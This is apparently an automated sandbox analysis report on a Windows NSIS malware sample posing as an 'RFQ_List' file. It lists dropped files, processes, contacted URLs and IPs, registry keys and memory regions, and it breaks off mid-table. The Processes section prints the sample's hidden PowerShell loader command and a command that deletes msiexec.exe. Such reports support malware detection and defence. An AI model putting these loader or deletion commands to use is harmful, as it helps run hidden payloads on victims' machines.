Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
RFQ_List.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Maidenliness.Hal37
|
ASCII text, with very long lines (3209), with CRLF, LF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes\RFQ_List.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes\RFQ_List.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\msiexec.exe.log
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Damascenere.lnk
|
MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun
Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kfn5nrr5.t0s.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ktypj4l3.rbd.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l1ciw54n.ydz.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ourykt1r.st3.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes\cellulomonas.irr
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes\eskimologens.for
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes\lila.bes
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes\onomatopoeical.kri
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes\pantomimer.sek
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes\semianimate.pol
|
dBase IV DBT, block length 2560, next free block index 21, next free block 0, next used block 0
|
dropped
|
||
|
C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\bekrigelsers.tai
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\campagnol.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Pedanter.Dou
|
data
|
dropped
|
||
|
C:\Windows\Resources\Nebengeschfter.ini
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 11 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\RFQ_List.exe
|
"C:\Users\user\Desktop\RFQ_List.exe"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"powershell.exe" -windowstyle hidden "$Noncuriousness=Get-Content -raw 'C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Maidenliness.Hal37';$Objektiviserende=$Noncuriousness.SubString(53938,3);.$Objektiviserende($Noncuriousness)"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\SysWOW64\msiexec.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\System32\msiexec.exe"
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\choice.exe
|
choice /C Y /N /D Y /T 3
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://www.google.com
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://checkip.dyndns.org/
|
158.101.44.242
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://drive.google.com/
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
http://reallyfreegeoip.org
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://reallyfreegeoip.org
|
unknown
|
||
|
https://drive.usercontent.google.com/
|
unknown
|
||
|
http://checkip.dyndns.org
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
http://checkip.dyndns.com
|
unknown
|
||
|
http://nsis.sf.net/NSIS_ErrorError
|
unknown
|
||
|
https://reallyfreegeoip.org/xml/155.94.241.188$
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://reallyfreegeoip.org/xml/155.94.241.188
|
188.114.97.3
|
||
|
https://reallyfreegeoip.org/xml/
|
unknown
|
There are 13 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
reallyfreegeoip.org
|
188.114.97.3
|
|
|
|
checkip.dyndns.org
|
unknown
|
|
|
|
drive.google.com
|
142.250.185.206
|
||
|
drive.usercontent.google.com
|
172.217.16.193
|
||
|
checkip.dyndns.com
|
158.101.44.242
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
188.114.97.3
|
reallyfreegeoip.org
|
European Union
|
|
|
|
142.250.185.206
|
drive.google.com
|
United States
|
||
|
158.101.44.242
|
checkip.dyndns.com
|
United States
|
||
|
172.217.16.193
|
drive.usercontent.google.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\Elefantridderen\archangelical
|
Usurpor125
|
||
|
HKEY_CURRENT_USER\studietiden\syrligere
|
journalistforbunds
|
||
|
HKEY_CURRENT_USER\pennies\Uninstall\tattling
|
healthguard
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
|
FileDirectory
|
There are 8 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
250F1000
|
trusted library allocation
|
page read and write
|
|
|
|
9279000
|
direct allocation
|
page execute and read and write
|
|
|
|
24EF0000
|
trusted library allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
7840000
|
trusted library allocation
|
page read and write
|
||
|
40A000
|
unkown
|
page read and write
|
||
|
D879000
|
direct allocation
|
page execute and read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
2EC0000
|
trusted library allocation
|
page read and write
|
||
|
24EF0000
|
trusted library allocation
|
page read and write
|
||
|
3800000
|
heap
|
page read and write
|
||
|
8708000
|
heap
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
793C000
|
stack
|
page read and write
|
||
|
24EF0000
|
trusted library allocation
|
page read and write
|
||
|
350B000
|
heap
|
page read and write
|
||
|
96000
|
stack
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
9424000
|
heap
|
page read and write
|
||
|
8823000
|
heap
|
page read and write
|
||
|
7810000
|
trusted library allocation
|
page read and write
|
||
|
2ED2000
|
trusted library allocation
|
page read and write
|
||
|
9481000
|
heap
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
25235000
|
trusted library allocation
|
page read and write
|
||
|
774E000
|
stack
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
27303000
|
heap
|
page read and write
|
||
|
24F00000
|
trusted library allocation
|
page read and write
|
||
|
90BE000
|
stack
|
page read and write
|
||
|
87BF000
|
heap
|
page read and write
|
||
|
24EF0000
|
trusted library allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
252B6000
|
trusted library allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
24EF0000
|
trusted library allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
2ECA000
|
trusted library allocation
|
page execute and read and write
|
||
|
8900000
|
trusted library allocation
|
page execute and read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
8520000
|
trusted library allocation
|
page read and write
|
||
|
942B000
|
heap
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
71D0000
|
heap
|
page read and write
|
||
|
31C9000
|
heap
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
24F00000
|
trusted library allocation
|
page read and write
|
||
|
3523000
|
heap
|
page read and write
|
||
|
7461000
|
heap
|
page read and write
|
||
|
6025000
|
trusted library allocation
|
page read and write
|
||
|
36FE000
|
unkown
|
page read and write
|
||
|
4E5E000
|
stack
|
page read and write
|
||
|
24D2E000
|
stack
|
page read and write
|
||
|
2ED7000
|
trusted library allocation
|
page execute and read and write
|
||
|
24F10000
|
heap
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
8920000
|
trusted library allocation
|
page read and write
|
||
|
4EE1000
|
trusted library allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
3181000
|
unkown
|
page read and write
|
||
|
2518D000
|
trusted library allocation
|
page read and write
|
||
|
31B0000
|
trusted library section
|
page read and write
|
||
|
27E5E000
|
stack
|
page read and write
|
||
|
8370000
|
heap
|
page read and write
|
||
|
25239000
|
trusted library allocation
|
page read and write
|
||
|
2D7C000
|
stack
|
page read and write
|
||
|
251E9000
|
trusted library allocation
|
page read and write
|
||
|
24ED0000
|
trusted library allocation
|
page read and write
|
||
|
315A000
|
unkown
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
24FC0000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
431000
|
unkown
|
page read and write
|
||
|
23DE000
|
stack
|
page read and write
|
||
|
4DDE000
|
stack
|
page read and write
|
||
|
250AE000
|
stack
|
page read and write
|
||
|
24BBE000
|
stack
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
24EE0000
|
trusted library allocation
|
page read and write
|
||
|
A679000
|
direct allocation
|
page execute and read and write
|
||
|
47F0000
|
trusted library allocation
|
page read and write
|
||
|
8525000
|
trusted library allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
24FC0000
|
trusted library allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
24EF0000
|
trusted library allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
25225000
|
trusted library allocation
|
page read and write
|
||
|
2F50000
|
heap
|
page read and write
|
||
|
7690000
|
trusted library allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
24EE0000
|
trusted library allocation
|
page read and write
|
||
|
7045000
|
heap
|
page execute and read and write
|
||
|
2EA4000
|
trusted library allocation
|
page read and write
|
||
|
24490000
|
direct allocation
|
page read and write
|
||
|
6FF0000
|
direct allocation
|
page read and write
|
||
|
24EE0000
|
trusted library allocation
|
page read and write
|
||
|
4850000
|
trusted library allocation
|
page read and write
|
||
|
25258000
|
trusted library allocation
|
page read and write
|
||
|
862E000
|
stack
|
page read and write
|
||
|
4C9C000
|
stack
|
page read and write
|
||
|
251E5000
|
trusted library allocation
|
page read and write
|
||
|
24E8E000
|
trusted library allocation
|
page read and write
|
||
|
32F0000
|
heap
|
page read and write
|
||
|
95A0000
|
heap
|
page read and write
|
||
|
46E000
|
unkown
|
page read and write
|
||
|
2726D000
|
stack
|
page read and write
|
||
|
249CE000
|
stack
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
24830000
|
heap
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
24FC0000
|
trusted library allocation
|
page read and write
|
||
|
24EA6000
|
trusted library allocation
|
page read and write
|
||
|
9120000
|
direct allocation
|
page execute and read and write
|
||
|
4832000
|
trusted library allocation
|
page read and write
|
||
|
329E000
|
stack
|
page read and write
|
||
|
7880000
|
trusted library allocation
|
page read and write
|
||
|
4D5E000
|
stack
|
page read and write
|
||
|
3157000
|
unkown
|
page read and write
|
||
|
75A9000
|
heap
|
page read and write
|
||
|
93FD000
|
heap
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
8A70000
|
trusted library allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
8415000
|
trusted library allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
77A9000
|
remote allocation
|
page execute and read and write
|
||
|
272D9000
|
heap
|
page read and write
|
||
|
24F20000
|
heap
|
page read and write
|
||
|
24EC0000
|
trusted library allocation
|
page read and write
|
||
|
480D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7596000
|
heap
|
page read and write
|
||
|
24EF0000
|
trusted library allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
6F90000
|
direct allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
9C79000
|
direct allocation
|
page execute and read and write
|
||
|
86E8000
|
heap
|
page read and write
|
||
|
25231000
|
trusted library allocation
|
page read and write
|
||
|
2498E000
|
stack
|
page read and write
|
||
|
482A000
|
trusted library allocation
|
page execute and read and write
|
||
|
24F00000
|
trusted library allocation
|
page read and write
|
||
|
2E50000
|
heap
|
page read and write
|
||
|
24F00000
|
trusted library allocation
|
page read and write
|
||
|
2E7E000
|
heap
|
page read and write
|
||
|
8630000
|
trusted library allocation
|
page read and write
|
||
|
7F000000
|
trusted library allocation
|
page execute and read and write
|
||
|
57C000
|
heap
|
page read and write
|
||
|
4A0000
|
heap
|
page read and write
|
||
|
1D5000
|
heap
|
page read and write
|
||
|
95E000
|
stack
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
942F000
|
heap
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
2A80000
|
heap
|
page read and write
|
||
|
2490D000
|
stack
|
page read and write
|
||
|
244B0000
|
direct allocation
|
page read and write
|
||
|
4D9F000
|
stack
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
9110000
|
trusted library allocation
|
page execute and read and write
|
||
|
24EF0000
|
trusted library allocation
|
page read and write
|
||
|
6016000
|
trusted library allocation
|
page read and write
|
||
|
3820000
|
heap
|
page read and write
|
||
|
226E000
|
stack
|
page read and write
|
||
|
316C000
|
unkown
|
page read and write
|
||
|
24EF0000
|
trusted library allocation
|
page read and write
|
||
|
6FD0000
|
direct allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
4C48000
|
trusted library allocation
|
page read and write
|
||
|
3820000
|
heap
|
page read and write
|
||
|
764B000
|
heap
|
page read and write
|
||
|
24E94000
|
trusted library allocation
|
page read and write
|
||
|
24EE0000
|
trusted library allocation
|
page read and write
|
||
|
24C10000
|
direct allocation
|
page read and write
|
||
|
471000
|
unkown
|
page readonly
|
||
|
24EE0000
|
trusted library allocation
|
page read and write
|
||
|
5EE6000
|
trusted library allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
BA79000
|
direct allocation
|
page execute and read and write
|
||
|
2EA3000
|
trusted library allocation
|
page execute and read and write
|
||
|
73FE000
|
stack
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
90FF000
|
stack
|
page read and write
|
||
|
2EE0000
|
heap
|
page read and write
|
||
|
4E81000
|
trusted library allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
2B6E000
|
stack
|
page read and write
|
||
|
93B0000
|
heap
|
page read and write
|
||
|
26119000
|
trusted library allocation
|
page read and write
|
||
|
31C0000
|
heap
|
page read and write
|
||
|
2E30000
|
heap
|
page read and write
|
||
|
25192000
|
trusted library allocation
|
page read and write
|
||
|
387F000
|
heap
|
page read and write
|
||
|
2ED0000
|
trusted library allocation
|
page read and write
|
||
|
8460000
|
trusted library allocation
|
page read and write
|
||
|
2519E000
|
trusted library allocation
|
page read and write
|
||
|
76A0000
|
trusted library allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
81A9000
|
remote allocation
|
page execute and read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
3525000
|
heap
|
page read and write
|
||
|
6F70000
|
direct allocation
|
page read and write
|
||
|
251E1000
|
trusted library allocation
|
page read and write
|
||
|
436000
|
unkown
|
page read and write
|
||
|
24EF0000
|
trusted library allocation
|
page read and write
|
||
|
75B9000
|
heap
|
page read and write
|
||
|
78C0000
|
trusted library allocation
|
page read and write
|
||
|
250E0000
|
heap
|
page execute and read and write
|
||
|
6F10000
|
direct allocation
|
page read and write
|
||
|
75EC000
|
heap
|
page read and write
|
||
|
27DDC000
|
stack
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
251D8000
|
trusted library allocation
|
page read and write
|
||
|
2755E000
|
stack
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
272A0000
|
heap
|
page read and write
|
||
|
57F000
|
heap
|
page read and write
|
||
|
956E000
|
stack
|
page read and write
|
||
|
24F00000
|
trusted library allocation
|
page read and write
|
||
|
244C0000
|
direct allocation
|
page read and write
|
||
|
24FC0000
|
trusted library allocation
|
page read and write
|
||
|
24FB1000
|
trusted library allocation
|
page read and write
|
||
|
602B000
|
trusted library allocation
|
page read and write
|
||
|
8440000
|
trusted library allocation
|
page read and write
|
||
|
489E000
|
stack
|
page read and write
|
||
|
24FC0000
|
trusted library allocation
|
page read and write
|
||
|
7890000
|
trusted library allocation
|
page read and write
|
||
|
9380000
|
direct allocation
|
page read and write
|
||
|
315D000
|
unkown
|
page read and write
|
||
|
24DD0000
|
heap
|
page read and write
|
||
|
4804000
|
trusted library allocation
|
page read and write
|
||
|
24C20000
|
direct allocation
|
page read and write
|
||
|
94EE000
|
unkown
|
page read and write
|
||
|
75F1000
|
heap
|
page read and write
|
||
|
4F0000
|
heap
|
page read and write
|
||
|
3410000
|
heap
|
page read and write
|
||
|
88F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2290000
|
heap
|
page read and write
|
||
|
2488E000
|
stack
|
page read and write
|
||
|
6F60000
|
direct allocation
|
page read and write
|
||
|
32DF000
|
stack
|
page read and write
|
||
|
6FB0000
|
direct allocation
|
page read and write
|
||
|
78B0000
|
trusted library allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
24F6D000
|
stack
|
page read and write
|
||
|
778E000
|
stack
|
page read and write
|
||
|
25221000
|
trusted library allocation
|
page read and write
|
||
|
86E0000
|
heap
|
page read and write
|
||
|
3522000
|
heap
|
page read and write
|
||
|
28DF000
|
stack
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
2751E000
|
stack
|
page read and write
|
||
|
81E000
|
stack
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
952E000
|
stack
|
page read and write
|
||
|
2424000
|
heap
|
page read and write
|
||
|
24EE0000
|
trusted library allocation
|
page read and write
|
||
|
40A000
|
unkown
|
page write copy
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
4E1B000
|
stack
|
page read and write
|
||
|
4EE000
|
stack
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
8640000
|
trusted library allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
248CF000
|
stack
|
page read and write
|
||
|
3169000
|
unkown
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
743E000
|
stack
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
2DF0000
|
heap
|
page read and write
|
||
|
2F5D000
|
stack
|
page read and write
|
||
|
76B0000
|
trusted library allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
270F1000
|
heap
|
page read and write
|
||
|
244A0000
|
direct allocation
|
page read and write
|
||
|
24EF0000
|
trusted library allocation
|
page read and write
|
||
|
48E0000
|
heap
|
page read and write
|
||
|
6DA9000
|
remote allocation
|
page execute and read and write
|
||
|
24EF0000
|
trusted library allocation
|
page read and write
|
||
|
4FD6000
|
trusted library allocation
|
page read and write
|
||
|
325F000
|
stack
|
page read and write
|
||
|
4FA9000
|
remote allocation
|
page execute and read and write
|
||
|
2210000
|
heap
|
page read and write
|
||
|
24EF0000
|
trusted library allocation
|
page read and write
|
||
|
4819000
|
trusted library allocation
|
page read and write
|
||
|
2E8C000
|
heap
|
page read and write
|
||
|
946B000
|
heap
|
page read and write
|
||
|
48E7000
|
heap
|
page read and write
|
||
|
B079000
|
direct allocation
|
page execute and read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
24EF0000
|
trusted library allocation
|
page read and write
|
||
|
88E2000
|
trusted library allocation
|
page read and write
|
||
|
48DE000
|
stack
|
page read and write
|
||
|
6F50000
|
direct allocation
|
page read and write
|
||
|
942F000
|
heap
|
page read and write
|
||
|
43F000
|
unkown
|
page read and write
|
||
|
7850000
|
trusted library allocation
|
page read and write
|
||
|
2769E000
|
stack
|
page read and write
|
||
|
24B80000
|
remote allocation
|
page read and write
|
||
|
3172000
|
unkown
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
7820000
|
trusted library allocation
|
page execute and read and write
|
||
|
946B000
|
heap
|
page read and write
|
||
|
37FF000
|
stack
|
page read and write
|
||
|
7DF000
|
stack
|
page read and write
|
||
|
3178000
|
unkown
|
page read and write
|
||
|
2295000
|
heap
|
page read and write
|
||
|
6FA0000
|
direct allocation
|
page read and write
|
||
|
3018000
|
heap
|
page read and write
|
||
|
4800000
|
trusted library allocation
|
page read and write
|
||
|
2523D000
|
trusted library allocation
|
page read and write
|
||
|
8380000
|
heap
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
83CE000
|
stack
|
page read and write
|
||
|
8742000
|
heap
|
page read and write
|
||
|
2F70000
|
heap
|
page read and write
|
||
|
24EF0000
|
trusted library allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
2FD0000
|
heap
|
page read and write
|
||
|
2460000
|
heap
|
page read and write
|
||
|
2522D000
|
trusted library allocation
|
page read and write
|
||
|
2FA0000
|
heap
|
page read and write
|
||
|
24EB5000
|
trusted library allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
471000
|
unkown
|
page readonly
|
||
|
2420000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
63A9000
|
remote allocation
|
page execute and read and write
|
||
|
270F1000
|
heap
|
page read and write
|
||
|
C479000
|
direct allocation
|
page execute and read and write
|
||
|
260F1000
|
trusted library allocation
|
page read and write
|
||
|
4460000
|
remote allocation
|
page execute and read and write
|
||
|
47E0000
|
trusted library section
|
page read and write
|
||
|
2EF1000
|
heap
|
page read and write
|
||
|
25290000
|
trusted library allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
24E5C000
|
stack
|
page read and write
|
||
|
24FC0000
|
trusted library allocation
|
page read and write
|
||
|
2299000
|
heap
|
page read and write
|
||
|
251A8000
|
trusted library allocation
|
page read and write
|
||
|
91F000
|
stack
|
page read and write
|
||
|
3500000
|
heap
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
2518F000
|
trusted library allocation
|
page read and write
|
||
|
275DE000
|
stack
|
page read and write
|
||
|
836D000
|
stack
|
page read and write
|
||
|
24FC0000
|
trusted library allocation
|
page read and write
|
||
|
24460000
|
direct allocation
|
page read and write
|
||
|
2E90000
|
trusted library allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
7644000
|
heap
|
page read and write
|
||
|
7560000
|
trusted library allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
316F000
|
unkown
|
page read and write
|
||
|
25195000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
2BBE000
|
stack
|
page read and write
|
||
|
2E58000
|
heap
|
page read and write
|
||
|
6F80000
|
direct allocation
|
page read and write
|
||
|
4E70000
|
heap
|
page execute and read and write
|
||
|
2EB0000
|
trusted library allocation
|
page read and write
|
||
|
8A80000
|
trusted library allocation
|
page read and write
|
||
|
2759E000
|
stack
|
page read and write
|
||
|
9465000
|
heap
|
page read and write
|
||
|
8700000
|
heap
|
page read and write
|
||
|
2519B000
|
trusted library allocation
|
page read and write
|
||
|
24B2C000
|
stack
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
7F018000
|
trusted library allocation
|
page execute and read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
90FD000
|
stack
|
page read and write
|
||
|
7570000
|
heap
|
page execute and read and write
|
||
|
2A70000
|
heap
|
page read and write
|
||
|
3960000
|
heap
|
page read and write
|
||
|
8710000
|
heap
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
4810000
|
trusted library allocation
|
page read and write
|
||
|
4CA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
24EE0000
|
trusted library allocation
|
page read and write
|
||
|
2B70000
|
